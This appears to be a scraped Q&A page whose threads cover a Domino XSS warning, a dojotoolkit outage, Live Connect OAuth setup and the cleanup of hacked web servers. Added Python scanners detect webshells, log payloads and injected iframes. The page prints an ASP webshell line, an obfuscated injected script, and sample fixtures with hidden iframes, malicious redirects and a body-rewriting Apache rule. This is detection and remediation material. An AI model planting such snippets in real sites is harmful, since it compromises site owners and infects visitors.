Cross site scripting in Domino? - lotus-domino

I have a Domino site that is getting highs for cross site scripting on app scan.
We don't have a license to run appscan. Another group needs to do that (yeah big corporations :) ). But I have noticed that the IE browser will complain too with a url as such:
http://myserver.com/cld/cldg.nsf/vwTOC?OpenView&Start=28
(IE will warn you about cross-site scripting with such a URL).
I noticed the notes.net forum site does not come up with such an error in IE, when I try to inject script tags. I guess it must scrub the url before the page is rendered? How is this being done in the notes.net forum? Is it done at server level or a database level?
I did find this thread
How to avoid a XSP/Domino Cross-Site Scripting Vulnerability?
where Steve mentions his blog and web rules but the blog mentions that they are not needed in 8.5.4. and above. Am I understanding that right? If so we are at 8.5.4. Is there something I still need to do to scrub my url?
Edit: We are at 8.5.3, not 8.5.4. I was mistaken. Our admin is going to try Steve's suggestions.

Related

Why is dojotoolkit.org suspended?

When I go to https://dojotoolkit.org/, I get, "Unable to connect". In some browsers I get "You have reached a domain that is pending ICANN verification".
I've used a number of dojo libraries in my code. Does anyone know what happened to the owner and whether this is likely to be fixed in the near future?
If it isn't fixed, what is my best option for replacing it?
This seems to be a temporary administrative DNS issue, based on their Twitter response:
We apologize for the issues accessing the Dojo 1 web site. We’re working on it as fast as possible. In the mean time, you can add the IP address directly to /etc/hosts. 104.16.205.241
There are also some workarounds on the dojo gitter.im channel:
Reference guide content is also at https://github.com/dojo/docs/ And tutorials are at https://github.com/dojo/dojo-website/tree/master/src/documentation/tutorials
Also, as mentioned in this related question, you can use the Archive.org Wayback Machine.
The site now appears to be back up. I was able to access it and get information on features I'm using.

How to properly configure application in Live Connect and project in Visual Studio 2013

My question here is pretty simple: how to properly (and 100%) configure both Live Connect and the project in Visual Studio 2013 in order for the local application to run and authenticate a user properly against a Microsoft account.
My question may be simple, but the answer is most likely not as simple. I've been reading countless articles and possible tutorials about this, but they are all fragmented and divided into small parts that do not really conciliate each other.
So below is the situation better described, with the steps I have followed.
[Steps Followed]
1) I have created a simple MVC application using Visual Studio 2013.
2) I have configured the project (using its properties) to use IIS Express with current Project Url : https://localhost:44302/
The project runs quite well, and external authentication with Facebook, Google and Twitter run very well too. Now for the tricky part:
3) I have created account with Microsoft and successfully created application in the Live Connect Developer Center.
4) Since configuring the field Redirect URLs to a simple http://localhost:<port> will not work (well...just because they didn't want it to, I suppose), I have additionally done the following:
5) Mapped in hosts file the following domain to localhost: # 127.0.0.1 mytestdomain.localtest.me
6) Reconfigured in Live Connect the Redirect URLs field to use the newly mapped domain: http://mytestdomain.localtest.me (although I have tried this with or without the port as well).
[End result]
With this configuration, the site runs properly locally. However, when I try to sign in with Microsoft account credentials (so, when I click the "Microsoft" button), I am redirected and receive the following message:
"We're unable to complete your request
Microsoft account is experiencing technical problems. Please try again later."
I honestly do not understand why wouldn't this work, when a couple of articles suggested that doing these specific steps would make it work.
What can I be missing, why would this happen at all?
If someone can write here what I am missing and we could all join efforts and create in this topic a full-fledged, 100% working configuration for local application testing with Microsoft authentication, I believe it would help everyone. If such a topic already exists and you can point me to it (because clearly I have missed it), that would also be great.
Thank you in advance,
Mad
Actually I just found out a proper and direct answer to my question. I totally missed it somehow during the last few days of research.
Microsoft's blog has all you need to make it work, and now mine does too. No big explanations and discussions, just basic and direct step by step article.
For those who could not find it and stumbled upon my topic here in StackOverflow, here is the link. Follow it word by word, and it will work.
Answer : Configuring your ASP.NET application for Microsoft OAuth account

I think ive been hacked and looking for advice

One of my clients noticed a message in Google search results that said their website may have been hacked. After some digging, I found HTML files on the server that contained SEO garbage and JavaScript references. I removed those files, changed CMS passwords, updated some components like CKFinder, etc...
I then started looking into other sites on the server and found tons of .asp files with this line
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
I've removed those but do not know how they got there. I've looked through various logs (event viewer, website, ftp) but most don't go back far enough from when the files were created.
I've updated the OS, which was only a month or two out of date, and changed ftp access.
What else can I do to find the point of entry or make sure my server and sites are safe?
BTW: This is a windows 2003 server running IIS 6.0.
There are multiple ways that they may have gotten access to your server.
Are you running a common CMS or custom?
It could be possible that they have found a vulnerability in one of your scripts.
For example, if they found a SQL injection vulnerability they could retrieve database information.
If they were to find an RCE bug (remote code execution) they may have been able to execute system commands, leading to the creation of those arbitrary files.
Other than that, there are a few vulnerabilities in windows server that have been patched this week, check out this link :
http://blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html
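As an added example (not from the question or the answer above), here is a small Python scanner for the pattern found in the planted .asp files: a server-side page that passes request input straight to Execute or Eval. It builds a constructed sample web root in a temporary directory, walks it, and reports each hit with the file's modification time, the same time-stamp lead the question tried to follow in the logs. The signature list and the set of file extensions are assumptions; on a real server it would be pointed at the web root or at a copy of it.

```python
import os
import re
import tempfile
from datetime import datetime

# Signatures for "execute whatever the request carries". The first is the exact
# classic-ASP line found on the compromised IIS 6 server; the others are the same
# idea in another ASP spelling and in PHP (assumed additions for completeness).
WEBSHELL_SIGNATURES = [
    ("asp-execute-request", re.compile(r"Execute\s*\(\s*Request\s*\(", re.IGNORECASE)),
    ("asp-eval-request", re.compile(r"Eval\s*\(\s*Request\s*\(", re.IGNORECASE)),
    ("php-eval-input", re.compile(r"eval\s*\(\s*(?:base64_decode\s*\()?\s*\$_(?:POST|GET|REQUEST)", re.IGNORECASE)),
]

# File types that are executed or rendered by the web server (assumption).
SCAN_EXTENSIONS = {".asp", ".aspx", ".asa", ".php", ".inc", ".html", ".htm"}


def scan_file(path):
    """Return a list of (signature_name, line_number) hits for one file."""
    hits = []
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, start=1):
                for name, pattern in WEBSHELL_SIGNATURES:
                    if pattern.search(line):
                        hits.append((name, lineno))
    except OSError:
        pass
    return hits


def scan_tree(root):
    """Walk a web root; return {relative_path: {"hits": [...], "mtime": iso}} for flagged files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fname)
            hits = scan_file(path)
            if hits:
                mtime = datetime.fromtimestamp(os.path.getmtime(path)).isoformat(timespec="seconds")
                findings[os.path.relpath(path, root)] = {"hits": hits, "mtime": mtime}
    return findings


def build_sample_site():
    """Constructed sample web root: one clean page, one include with the planted line."""
    root = tempfile.mkdtemp(prefix="iis-sample-")
    os.makedirs(os.path.join(root, "inc"))
    with open(os.path.join(root, "default.asp"), "w") as fh:
        fh.write('<% Response.Write("hello") %>\n<html><body>ok</body></html>\n')
    with open(os.path.join(root, "inc", "footer.asp"), "w") as fh:
        fh.write("<!-- footer -->\n")
        fh.write('<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile\n')
    with open(os.path.join(root, "logo.gif"), "wb") as fh:
        fh.write(b"GIF89a")  # binary file, skipped by extension
    return root


if __name__ == "__main__":
    root = build_sample_site()
    for path, info in sorted(scan_tree(root).items()):
        print(f"{path}  modified {info['mtime']}")
        for name, lineno in info["hits"]:
            print(f"    line {lineno}: {name}")
```

The modification time is printed next to each hit so that the dates of the planted files can be lined up against whatever log retention is still available, which is how the question's author was trying to narrow down the point of entry.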

Malware on the site as per google but I cannot find it

Yesterday when I came to one of my sites I got a warning from Google that there is malware on my site. I looked at the code and there was indeed some JavaScript that shouldn't be there. I googled it and didn't find anything useful. When I came back to my site, that code was gone, but Google (when accessing the site from the search engine) and Google Chrome still give me a warning that there is malware on my site.
I looked at Webmaster Tools and they have identified a few pages as problematic. One of them is http://www.keramikfliesen.com/schweiz/rimini/. The code that is listed in Webmaster Tools under Malware is:
<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b#%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^#$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!#!?
^+^]^!^$+*^&^#!&&<!$$|&^^]&_&*!!$|++&<!+&*^#&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^#&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$#!?^+$:^#&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*^]&!
^<$#$$^]$$$#&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$#$$^#&*!?!|&:!$&*!^^]$$$#&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$#
$$^#!|&<!+&?^]$~$$^#&!^^^]$$&?!+!+!|^#$~$~$$$#!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$#$$$~!+
&~!|^$$_&?!+&]&)$$^#!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!#!]^#&?$_!|!$&~!+&~!+!:!|&*^]!#&$^#&&!*&_&^!+&:&~&_$?$:!#
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!#!&&<!$$|&&^]
&+&~
Can you please help me out? How should I fight this?
Thank you all very much for your help in advance!
Remove the malware from your webpages.
Immediately change your passwords.
Also check for any XSS (cross-site scripting) and SQL injection vulnerabilities.
Deactivate plugins that are not highly ranked or from a reputed source.
Use secure protocols. Check out StopBadware.org's Tips for Cleaning and Securing Your Website.
Keep an eye on your log files.
Stay up-to-date with the latest software updates and patches.
Hope it helps!
If the code appears again, then the attacker left some script, which, on request, runs the infecting procedure. Usually this script receives an encoded string of the malcode (e.g. in base64), decodes it and executes via eval(). You should find this file (it is most likely a PHP script) and remove it. To find it look at the log and search for suspicious requests (e.g. a single POST request, transmitting base64 string is a very suspicious one).
Most probably your hosting has been compromised (password stolen) by an automated tool.
These tools typically inject some JavaScript inside JS files in order to infect the people visiting your pages with malware. You should:
Change your passwords.
Restore the most recent non-compromised backup.
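To illustrate the log search suggested in the answer that describes the dropper script, here is an added Python example (not part of any answer above) that scans web-server access-log lines in the Apache/nginx combined format for two leads: a POST to a script that is not one of the site's known form handlers, and a query string carrying a long base64 run that decodes to readable text. The sample log lines, the KNOWN_POST_PATHS set and the 40-character threshold are constructed assumptions for the demonstration.

```python
import base64
import re
import string

# Apache/nginx "combined" log format. The request line carries the method and the
# target (path plus query string). POST bodies are never written to the access log,
# so a body-borne payload only shows up as an unexpected POST to an unexpected script.
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A run of at least 40 base64 characters inside a URL is unusual on an ordinary site.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
PRINTABLE = set(bytes(string.printable, "ascii"))

# Assumption: the only scripts on the constructed sample site that legitimately
# receive POSTs (a contact form and the CMS login). Any other POST target is a lead.
KNOWN_POST_PATHS = {"/contact.php", "/wp-login.php"}


def looks_like_encoded_code(token):
    """True if a base64 run decodes to mostly printable text (HTML/JS/PHP rather than noise)."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    if not raw:
        return False
    printable = sum(1 for b in raw if b in PRINTABLE)
    return printable / len(raw) > 0.9


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def find_suspicious(log_text):
    """Return [(reason, ip, method, target)] for the log lines worth investigating."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["target"].split("?", 1)[0]
        if rec["method"] == "POST" and path not in KNOWN_POST_PATHS:
            findings.append(("post-to-unexpected-script", rec["ip"], rec["method"], rec["target"]))
        for token in B64_RUN.findall(rec["target"]):
            if looks_like_encoded_code(token):
                findings.append(("base64-payload-in-url", rec["ip"], rec["method"], rec["target"]))
                break
    return findings


def build_sample_log():
    """Constructed sample: two ordinary visitors, then one client that POSTs to a script
    planted in an image cache directory and fetches a page with a base64 blob in the query."""
    payload = base64.b64encode(
        b"<script>document.write('<iframe src=\"x\" width=0 height=0></iframe>')</script>"
    ).decode()
    lines = [
        '203.0.113.7 - - [12/Feb/2014:08:01:12 +0100] "GET /schweiz/rimini/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
        '203.0.113.7 - - [12/Feb/2014:08:01:13 +0100] "POST /contact.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
        '198.51.100.4 - - [12/Feb/2014:08:02:40 +0100] "GET /wp-login.php HTTP/1.1" 200 880 "-" "Mozilla/5.0"',
        '198.51.100.9 - - [12/Feb/2014:03:14:07 +0100] "POST /images/cache/sess.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"',
        f'198.51.100.9 - - [12/Feb/2014:03:14:09 +0100] "GET /index.php?p={payload} HTTP/1.1" 200 4900 "-" "Mozilla/4.0"',
    ]
    return "\n".join(lines)


if __name__ == "__main__":
    for reason, ip, method, target in find_suspicious(build_sample_log()):
        print(f"{reason:28} {ip:15} {method} {target[:60]}")
```

The two checks are deliberately simple: the point is to surface the handful of lines to read by hand out of a large log, not to classify them. Each flagged target also tells you which file to look at on disk, which is where the dropper script itself will be.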

Apache attack on compromised server, iframe injected by string replace

My server has been compromised recently. This morning, I have discovered that the intruder is injecting an iframe into each of my HTML pages. After testing, I have found out that the way he does that is by getting Apache (?) to replace every instance of
<body>
by
<iframe link to malware></iframe></body>
For example if I browse a file residing on the server consisting of:
</body>
</body>
Then my browser sees a file consisting of:
<iframe link to malware></iframe></body>
<iframe link to malware></iframe></body>
I have immediately stopped Apache to protect my visitors, but so far I have not been able to find what the intruder has changed on the server to perform the attack. I presume he has modified an Apache config file, but I have no idea which one. In particular, I have looked for recently modified files by time-stamp, but did not find anything noteworthy.
Thanks for any help.
Tuan.
PS: I am in the process of rebuilding a new server from scratch, but in the meantime I would like to keep the old one running, since this is a business site.
I don't know the details of your compromised server. While this is a fairly standard drive-by attack against Apache that you can, ideally, resolve by rolling back to a previous version of your web content and server configuration (if you have a colo, contact the technical team responsible for your backups), let's presume you're entirely on your own and need to fix the problem yourself.
Pulling from StopBadware.org's documentation on the most common drive-by scenarios and resolution cases:
Malicious scripts
Malicious scripts are often used to redirect site visitors to a different website and/or load badware from another source. These scripts will often be injected by an attacker into the content of your web pages, or sometimes into other files on your server, such as images and PDFs. Sometimes, instead of injecting the entire script into your web pages, the attacker will only inject a pointer to a .js or other file that the attacker saves in a directory on your web server.
Many malicious scripts use obfuscation to make them more difficult for anti-virus scanners to detect:
Some malicious scripts use names that look like they’re coming from legitimate sites (note the misspelling of “analytics”):
.htaccess redirects
The Apache web server, which is used by many hosting providers, uses a hidden server file called .htaccess to configure certain access settings for directories on the website. Attackers will sometimes modify an existing .htaccess file on your web server or upload new .htaccess files to your web server containing instructions to redirect users to other websites, often ones that lead to badware downloads or fraudulent product sales.
Hidden iframes
An iframe is a section of a web page that loads content from another page or site. Attackers will often inject malicious iframes into a web page or other file on your server. Often, these iframes will be configured so they don’t show up on the web page when someone visits the page, but the malicious content they are loading will still load, hidden from the visitor’s view.
How to look for it
If your site was reported as a badware site by Google, you can use Google’s Webmaster Tools to get more information about what was detected. This includes a sampling of pages on which the badware was detected and, using a Labs feature, possibly even a sample of the bad code that was found on your site. Certain information can also be found on the Google Diagnostics page, which can be found by replacing example.com in the following URL with your own site’s URL:
www.google.com/safebrowsing/diagnostic?site=example.com
There exist several free and paid website scanning services on the Internet that can help you zero in on specific badware on your site. There are also tools that you can use on your web server and/or on a downloaded copy of the files from your website to search for specific text. StopBadware does not list or recommend such services, but the volunteers in our online community will be glad to point you to their favorites.
In short, use the stock-standard tools and scanners provided by Google first. If the threat can't otherwise be identified, you'll need to backpath through the code of your CMS, Apache configuration, SQL setup, and remaining content of your website to determine where you were compromised and what the right remediation steps should be.
Best of luck handling your issue!
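As an added example that is not part of the answer or of StopBadware's material, the following Python script searches a downloaded copy of a site, plus its Apache configuration files, for the indicators the quoted text describes: hidden or zero-sized iframes, script tags loading from hosts outside a trusted list, and .htaccess directives that redirect visitors. Because the question's symptom is every closing body tag being rewritten server-side, it also flags the Apache directives that rewrite response bodies on the way out (mod_substitute's Substitute directive and the output-filter directives), which is one place a config-level change of that kind would show up. The trusted-host list, the sample pages, the .invalid host names and the directory layout are constructed for the demonstration.

```python
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts allowed to serve scripts to this site. An assumption for the constructed
# sample; a real run lists the site's own domain plus the CDNs it knowingly uses.
TRUSTED_SCRIPT_HOSTS = {"www.example.com", "ajax.googleapis.com"}

# Apache directives worth reading in .htaccess and *.conf: ones that send visitors
# elsewhere, and ones that rewrite response bodies (mod_substitute / output filters).
# Both have legitimate uses, so each hit is a lead to read, not a verdict.
REDIRECT_DIRECTIVE = re.compile(
    r"^\s*(Redirect(?:Match|Permanent|Temp)?|RewriteRule)\s+(.*)$", re.IGNORECASE | re.MULTILINE)
OUTPUT_FILTER_DIRECTIVE = re.compile(
    r"^\s*(Substitute|SetOutputFilter|AddOutputFilter(?:ByType)?|ExtFilterDefine)\s+(.*)$",
    re.IGNORECASE | re.MULTILINE)
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)


class InjectionFinder(HTMLParser):
    """Collect iframes that are hidden or zero-sized, and scripts loaded from untrusted hosts."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "").strip() for k, v in attrs}
        if tag == "iframe":
            zero_sized = a.get("width") in {"0", "0px"} or a.get("height") in {"0", "0px"}
            if zero_sized or HIDDEN_STYLE.search(a.get("style", "")):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script" and a.get("src"):
            host = urlparse(a["src"]).hostname
            if host and host not in TRUSTED_SCRIPT_HOSTS:
                self.findings.append(("offsite-script", a["src"]))


def scan_html(text):
    parser = InjectionFinder()
    parser.feed(text)
    return parser.findings


def scan_apache_config(text):
    found = [("redirect-directive", m.group(0).strip()) for m in REDIRECT_DIRECTIVE.finditer(text)]
    found += [("output-filter-directive", m.group(0).strip()) for m in OUTPUT_FILTER_DIRECTIVE.finditer(text)]
    return found


def scan_site(root):
    """Return {relative_path: [(indicator, detail), ...]} over a copy of the site and its config."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if fname == ".htaccess" or fname.lower().endswith(".conf"):
                found = scan_apache_config(text)
            elif fname.lower().endswith((".html", ".htm", ".php", ".asp")):
                found = scan_html(text)
            else:
                continue
            if found:
                report[os.path.relpath(path, root)] = found
    return report


def build_sample_site():
    """Constructed sample tree: a clean page, an injected page, a planted .htaccess,
    and an httpd.conf that rewrites every closing body tag."""
    root = tempfile.mkdtemp(prefix="site-copy-")
    os.makedirs(os.path.join(root, "schweiz", "rimini"))
    os.makedirs(os.path.join(root, "conf"))
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write('<html><body><script src="https://ajax.googleapis.com/ajax/libs/dojo/1.9.1/dojo/dojo.js"></script>'
                 '<iframe src="/embed/video.html" width="400" height="300"></iframe></body></html>')
    with open(os.path.join(root, "schweiz", "rimini", "index.html"), "w") as fh:
        fh.write('<html><body><p>Rimini</p>'
                 '<iframe src="http://badware.invalid/x.php" width="0" height="0" style="display:none"></iframe>'
                 '<script src="http://google-analytlcs.invalid/ga.js"></script></body></html>')
    with open(os.path.join(root, "schweiz", ".htaccess"), "w") as fh:
        fh.write("Options -Indexes\nRewriteEngine On\nRewriteCond %{HTTP_REFERER} google\n"
                 "RewriteRule ^(.*)$ http://badware.invalid/go.php [R,L]\n")
    with open(os.path.join(root, "conf", "httpd.conf"), "w") as fh:
        fh.write("LoadModule substitute_module modules/mod_substitute.so\n<Location />\n"
                 "    SetOutputFilter SUBSTITUTE\n"
                 "    Substitute \"s|</body>|<iframe src=http://badware.invalid/f.php></iframe></body>|i\"\n"
                 "</Location>\n")
    return root


if __name__ == "__main__":
    for path, found in sorted(scan_site(build_sample_site()).items()):
        print(path)
        for indicator, detail in found:
            print(f"    {indicator}: {detail}")
```

Running it against a copy of the document root rather than the live server keeps the scan independent of whatever the compromised Apache is serving, which matters here precisely because the pages on disk may be clean while the responses are not; the config scan is what covers that case.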